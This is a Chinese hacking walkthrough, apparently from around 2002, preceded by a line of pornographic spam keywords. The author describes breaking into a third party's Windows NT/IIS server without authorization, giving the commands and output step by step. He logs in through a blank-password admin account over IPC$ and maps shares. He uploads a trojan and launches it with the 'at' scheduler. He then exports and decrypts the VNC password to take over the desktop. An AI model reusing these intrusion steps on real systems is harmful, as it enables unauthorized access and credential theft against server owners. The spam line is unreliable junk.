欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

(作者：xhacker)

    今天晚上在網(wǎng)上準備找一些可看性強的技術(shù)文章用已提高水平，但有幾個(gè)不錯的網(wǎng)絡(luò )安全網(wǎng)站又不知什么原因關(guān)閉了。找不到什么好文章，這樣我就自己找一臺服務(wù)器練習一下，因為這樣也能學(xué)到不少技術(shù)。于是我翻了翻以前保存下來(lái)的掃描結果,看到有一臺服務(wù)器賬號較多,共有400多個(gè)，其中有個(gè)stone賬號的密碼為空(admin權限)?？磥?lái)網(wǎng)管沒(méi)有開(kāi)置密碼策略，好，就選這臺服務(wù)器下手。先ping一下，看看這臺服務(wù)器是否存在(服務(wù)器IP地址以x.x.x.x替代表示)：

E:\>ping x.x.x.x

Pinging x.x.x.x with 32 bytes of data:

Reply from x.x.x.x: bytes=32 time=381ms TTL=110

Reply from x.x.x.x: bytes=32 time=320ms TTL=110

Reply from x.x.x.x: bytes=32 time=321ms TTL=110

Reply from x.x.x.x: bytes=32 time=320ms TTL=110

 

Ping statistics for x.x.x.x:

    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

    Minimum = 320ms, Maximum =  381ms, Average =  335ms

 

好了，以下就不多說(shuō)了，ipc$入侵教程多的是，大家一看就明白。

過(guò)程如下：

E:\>net use \\x.x.x.x\ipc$ "" /user:stone

命令成功完成。

 

E:\>dir \\x.x.x.x\c$

找不到網(wǎng)絡(luò )名。

 

E:\>dir \\x.x.x.x\admin$

找不到網(wǎng)絡(luò )名。

 

E:\>dir \\x.x.x.x\d$

找不到網(wǎng)絡(luò )名。

 

E:\>dir \\x.x.x.x\E$

找不到網(wǎng)絡(luò )名。

…………

倒！運氣不好啊，網(wǎng)管這方面倒還有點(diǎn)安全意識，把winnt的所有默認共享全去掉了，其實(shí)這點(diǎn)反而激發(fā)了我的興趣啊?，F在的情況是獲得了一個(gè)admin的賬號，但是卻沒(méi)有一個(gè)默認的可寫(xiě)目錄和根目錄，所以不能用常規的方式進(jìn)一步獲取資源了。呵呵，希望還是有的！接下來(lái)我自己尋找可寫(xiě)目錄,查查看網(wǎng)管自己有沒(méi)有設置共享資源吧。如下:

E:\>net view \\x.x.x.x

在 \\x.x.x.x 的共享資源

資源共享名   類(lèi)型         用途  注釋

 

------------------------------------------------------------------

ADHot        Disk

APPL         Disk

DATABASE     Disk

demo_1       Print                 \\Demo\demo_1

HPLJ5si      Print                 HP LaserJet 5Si

HPlp1        Print                 HP LaserJet 5Si (Linux Shared)

IED          Disk

InetPub      Disk

internal     Disk

NETLOGON     Disk                  登入伺服器資源分享

SALES        Disk

sharing      Disk

temp         Disk

visio        Disk

工程DownLoad資料庫

             Disk

業(yè)務(wù)DownLoad資料庫

             Disk

雅邁y2k      Disk

命令成功完成。

 

太棒了，有這么多共享目錄，看來(lái)這是一臺工作服務(wù)器，是為了內部網(wǎng)里的工作需要設定了相應的共享資源。我們接下來(lái)映射共享硬盤(pán)吧，從Inetpub開(kāi)始吧，這是winnt/2k默認的存放主頁(yè)的地方，它都共享真是最好不過(guò)了，許多漏洞都和它有關(guān)。我的利用過(guò)程如下：

 

E:\>net use g: \\x.x.x.x\Inetpub

命令成功完成。

 

OK!現在為了方便，把當前的本地硬盤(pán)切換到虛擬映射的硬盤(pán)吧。

隨便再看看這個(gè)共享目錄有沒(méi)有對stone賬號開(kāi)放寫(xiě)入權限。隨便創(chuàng )建一個(gè)目錄，我創(chuàng )建個(gè)xhacker目錄，如下：

D:\>g:

 

G:\>md xhacker

 

G:\>dir

 驅動(dòng)器 G 中的卷沒(méi)有標簽。

 卷的序列號是 6803-C297

 

 G:\ 的目錄

 

2002-06-14  21:37       <DIR>          .

2002-06-14  21:37       <DIR>          ..

2002-06-06  18:04       <DIR>          ASPSamp

2000-04-14  04:28                2,940 c.txt

2002-06-14  17:59       <DIR>          Catalog.wci

2002-06-14  20:37       <DIR>          ftproot

1998-11-11  11:27       <DIR>          gophroot

2001-11-26  10:07       <DIR>          iissamples

2000-01-04  14:22       <DIR>          mail

2000-01-04  14:26       <DIR>          Mailroot

2002-06-14  11:14       <DIR>          scripts

2000-04-14  04:27                   26 Test.bat

2001-02-02  13:29       <DIR>          wwwroot

2002-06-14  21:37       <DIR>          xhacker  （就是這個(gè)，我才創(chuàng )建的）

               2 個(gè)文件          2,966 字節

              12 個(gè)目錄    706,426,880 可用字節

 

看到了嗎？呵呵，這下可好了。有希望拿admin。再看看scripts里內容再說(shuō)吧。過(guò)程如下：

 

G:\>dir scripts

 驅動(dòng)器 G 中的卷沒(méi)有標簽。

 卷的序列號是 6803-C297

 

 G:\scripts 的目錄

 

2002-06-14  11:14       <DIR>          .

2002-06-14  11:14       <DIR>          ..

2002-06-14  11:14       <DIR>          iisadmin

               0 個(gè)文件              0 字節

               3 個(gè)目錄    706,426,880 可用字節

 

怎么會(huì )沒(méi)有？沒(méi)關(guān)系，再看看wwwroot,這也是經(jīng)常存放主頁(yè)的地方：

 

G:\>dir wwwroot

 驅動(dòng)器 G 中的卷沒(méi)有標簽。

 卷的序列號是 6803-C297

 

 G:\wwwroot 的目錄

 

2001-02-02  13:29       <DIR>          .

2001-02-02  13:29       <DIR>          ..

1998-02-24  13:04                4,630 default.asp

1996-11-26  00:00                3,685 default.htm

2002-06-13  21:43       <DIR>          demotop

2000-05-25  09:49               23,155 e.htm

2000-01-04  16:40                2,890 Home.htm

1999-12-30  15:28       <DIR>          images

2000-06-01  15:32                8,143 index.htm

2001-11-26  10:07       <DIR>          Phone Book Service

2001-05-30  00:28       <DIR>          recovery

2000-05-25  09:50                6,689 Weekly.htm

1999-12-30  15:28       <DIR>          _private

2000-01-04  14:29       <DIR>          _vti_log

………（略）

              16 個(gè)文件        106,073 字節

               8 個(gè)目錄    706,426,880 可用字節

 

呵呵，看上去這好像是存放主頁(yè)的目錄了。習慣性地放了個(gè)idq.dll上去（提升權限），ispc不上，我還以為這就能拿到了admin呢?？磥?lái)沒(méi)有開(kāi)放虛擬目錄執行權限啊。這時(shí)想到了瀏覽主頁(yè)，暈倒，404錯誤，找不到。不知是不是沒(méi)配置好iis，看來(lái)利用admin賬號連接ipc獲取最高控制權的思路已經(jīng)中斷了(在這里我也虛擬了好幾個(gè)共享資源，嘗試找到可利用資源，比如口令文件等，根本找不到什么重要的)。本以為一個(gè)現成的admin賬號就能拿到它了，現在看沒(méi)這么簡(jiǎn)單，我們還是分析一下服務(wù)器開(kāi)了哪些服務(wù)再找突破口吧：

x.x.x.x的端口信息：

 

* + x.x.x.x   adsl-61-56-234-146.NHON.sparqnet.net

       |___    21  File Transfer Protocol [Control]  （可以嘗試破解并登錄，但不推薦）

              |___ 220 demont Microsoft FTP Service (Version 4.0)...

       |___    53  Domain Name Server

       |___    80  World Wide Web HTTP (掃描cgi,iis漏洞，不過(guò)好像iis工作不正常）

              |___ HTTP/1.1 404 ............Server: Microsoft-IIS/4.0..Date: Fri, 14 Jun 2002 15:19:05 GMT..Content-Type: text/html..Content-Lengt

       |___   135  DCE endpoint resolution

       |___   139  NETBIOS Session Service

       |___   443  https  MCom

       |___  5005  avt-profile-2

       |___  5800  Virtual Network Computing server

       |___  5900  Virtual Network Computing server  (VNC服務(wù)，考慮這個(gè)登錄)

              |___ RFB 003.003.

       |___  8000  iRDMI/Shoutcast Server

：

呵呵，現在我主要可利用入侵的服務(wù)有21,80,5900，由此判斷出這是一臺winnt+iis4.0,而之前我沒(méi)有進(jìn)行掃描端口完全是光想著(zhù)用現成admin權限的stone賬號進(jìn)入。這樣對方即使開(kāi)了www服務(wù)，我的那個(gè)idq.dll也是沒(méi)用的，idq.dll只對win2k+sp3以下有效，所以應該放置一些winnt相關(guān)的iis漏洞,比如放一個(gè)bat文件放入scripts去拿admin?？墒沁@臺服務(wù)器的www沒(méi)有設定好，無(wú)法通過(guò)瀏覽器調用文件。下面再接著(zhù)分析吧，大家可能對這個(gè)5900端口了解的不多，我現在就先從5900開(kāi)始刺探。這里我簡(jiǎn)單給5900(VNC遠程控制軟件所開(kāi)的端口)介紹幾句，VNC——Virtual Network Computing（即虛擬網(wǎng)絡(luò )計算機系統）是由AT&T開(kāi)發(fā)的各種操作系統之間的相互操作管理系統，使用VNC可以使你在不同的計算機之間實(shí)現真正的相互操作，不過(guò)，VNC只限于GUI之間的相互操作，如Windows同Linux系統的X Window之間相互操作，Windows同Macintosh之間的相互操作等,它可以安裝在Windows中而讓使用者在遠端遙控自己的電腦，就算是遙控不同的操作平臺也沒(méi)有問(wèn)題.(winnt遠程管理服務(wù)軟件主要就是win2k3389，pcanywhere,VNC, Remote Administrator等等)?，F在有了個(gè)思路，因為vnc的密碼就在注冊表\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password 鍵值或者是

\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password鍵值里，我們先讀出這個(gè)鍵值后再用相應算法解出來(lái)就是VNC的遠程管理密碼了。于是我重建了ipc$空連接，接著(zhù)打開(kāi)regedit注冊表編輯器，選擇“連接遠程注冊表”，輸入IP地址x.x.x.x，好了，出現了以下的圖1:

出現了三個(gè)鍵值，然后查找vnc的密碼鍵值，從HKEY_USERS主鍵找好了，非常遺憾，沒(méi)有找到password鍵值，看來(lái)新版VNC出于安全考慮，把這個(gè)主鍵的密碼去掉了 ,新版的VNC軟件的密碼鍵值存放在HKEY_CURRENT_USER主鍵中，但即使有個(gè)admin賬號在遠程也讀不出這個(gè)主鍵。 這樣通過(guò)VNC來(lái)入侵的思路又斷了，真不好辦。接著(zhù)又想了不少辦法，其中也不乏有巧妙的，比如在HKEY_CLASSES_ROOT改變某文件關(guān)聯(lián)，指其關(guān)聯(lián)指向我預先在inetpub放置的一個(gè)捆綁文件默認關(guān)聯(lián)程序的木馬，其實(shí)這種方法實(shí)際上有可能成功，但是需要時(shí)間去等侍，所以我還是放棄了這種被動(dòng)的手段。

現在我再來(lái)做個(gè)總結，目前我遇到的困難是對方把c$,d$,admin$都關(guān)了,可我已有了個(gè)admin賬號了，難道真的像其它安全策略文章所說(shuō)的那樣，只要關(guān)掉admin$,c$,d$等等這些系統默認共享，入侵者即使有個(gè)admin賬號也進(jìn)不來(lái)了。我向來(lái)不輕信這些安全建議的文章，在反復思考當中，我突然靈感一現，又想回到共享資源上著(zhù)手，試想，如果把一個(gè)木馬拷貝到一個(gè)共享目錄里，然后遠程再觸發(fā)它運行就好了。關(guān)鍵在于怎么觸發(fā)它，下套肯定是不聰明的表現。我想起了at命令，這個(gè)命令大家都用習慣了遠程啟動(dòng)admin$或admin$\system32下面的木馬,現在這臺服務(wù)器的admin$關(guān)了，所以讓我嘗試一下放在其它path啟動(dòng)，我又看看共享資源列表，決定放在inetpub\scripts下，因為這個(gè)目錄默認是c:\inetpub\scripts之下（沒(méi)有裝多系統的情況下）。好了，這個(gè)有意思 的入侵策略制定好后，剩下的就是做木馬、上傳和啟動(dòng)了。木馬我是用janker的winshell5.0直接生成的，所以不多說(shuō)了，我給木馬起名為server.exe。接下來(lái)就是上傳，

copy d:\server.exe g:\scripts  (G:虛擬的是服務(wù)器的inetpub，所以直接輸入scripts)

OK,這個(gè)不難看懂。下面再進(jìn)行最關(guān)鍵的一步:

Net time \\x.x.x.x

\\x.x.x.x 的當前時(shí)間是 2002/6/25 下午 08:49

命令成功完成。

At \\x.x.x.x.x 20:51 c:\inetpub\scripts\server.exe  (這句是不是和以往的用法不太一樣)

新加了一項作業(yè)，其作業(yè) ID = 1

 

好了，這樣就使服務(wù)器的計劃任務(wù)在08:51自動(dòng)啟動(dòng)指定的共享目錄下的木馬server.exe,嘿嘿，現在再逗網(wǎng)友snake玩，呵呵，他是個(gè)很好玩的編程牛人,我天天逗他玩。 時(shí)間已經(jīng)差不多了，再看看，net time \\x.x.x.x

x.x.x.x 的當前時(shí)間是 2002/6/25 下午 09:02

好，telnet上玩玩，呵呵,果然成功！現在終于拿到個(gè)高權限的shell了。不過(guò)就是命令行狀態(tài)的，怎么說(shuō)軟件也進(jìn)入窗子時(shí)代了，要改改了。這時(shí)我就想到了服務(wù)器上運行著(zhù)的5900,現在取它的遠程控制密碼，過(guò)會(huì )用它來(lái)遠程控制服務(wù)器。好的，看我怎么取得它的密碼，telnet上剛才的木馬，然后運行這么一句導出注冊表中的vnc密碼關(guān)鍵值:

regedit /e xhacker.reg HKEY_CURRENT_USER\Software\ORL\WinVNC3

OK,然后type xhacker.reg

[HKEY_CURRENT_USER\Software\ORL\WinVNC3]

"SocketConnect"=dword:00000001

"AutoPortSelect"=dword:00000001

"InputsEnabled"=dword:00000001

"LocalInputsDisabled"=dword:00000000

"IdleTimeout"=dword:00000000

"QuerySetting"=dword:00000002

"QueryTimeout"=dword:0000000a

"Password"=hex: cd,7c,b9,bd,c7,e9,0c,c9 (關(guān)鍵啊，記下這個(gè))

"PollUnderCursor"=dword:00000000

"PollForeground"=dword:00000001

"PollFullScreen"=dword:00000000

"OnlyPollConsole"=dword:00000001

"OnlyPollOnEvent"=dword:00000000

 

找到了我要的健值了，接下來(lái)回到本地機破解這個(gè)鍵值的明文密碼吧（翻了老半天終于找到個(gè)程序是破vnc的，不是窮舉密碼哦）,把剛才的8個(gè)字段一一輸入，注意x4的參數W是大寫(xiě)的。

D:\>x4 -W

cd

7c

b9

bd

c7

e9

0c

c9

Entered HEX String: cd 7c b9 bd c7 e9 c c9

VNC Password: 58218411 (一秒鐘都不要就算出來(lái)了！)

呵呵，密碼是標準的8位純數字58218411，有什么含義呢？不猜了。下面就可以登錄他的桌面了，嘿嘿，如下圖2:

圖3： 

看到了桌面也沒(méi)覺(jué)得什么有成就感，有價(jià)值的是又一次開(kāi)拓了我的思維,也讓我意識到有些習慣性思維的確是一種障礙，比如文中提到的至關(guān)重要的一個(gè)突破口at命令，以前at運行admin$下的程序慣了，一時(shí)想不到它的其它用法,現在還是有其它利用方式的，比如這次就是上傳server.exe木馬至一個(gè)可寫(xiě)目錄里，然后遠程用at激活運行它。后來(lái)我又進(jìn)行了一些實(shí)驗，發(fā)現在這種情況下即使網(wǎng)管取消所有共享資源我也可以輕松進(jìn)桌面，系統只要開(kāi)個(gè)ipc$就可以了,當然這不是說(shuō)上面的入侵方式?jīng)]有價(jià)值了，其實(shí)上面的方式通用性較好。所以我建議大家要真的想關(guān)admin$,c$,d$…還不如只關(guān)閉個(gè)ipc$。好了，這次入侵就記錄到這，本人水平有限，如果大家有興趣與我交流或給我指正，請聯(lián)系QQ:66680800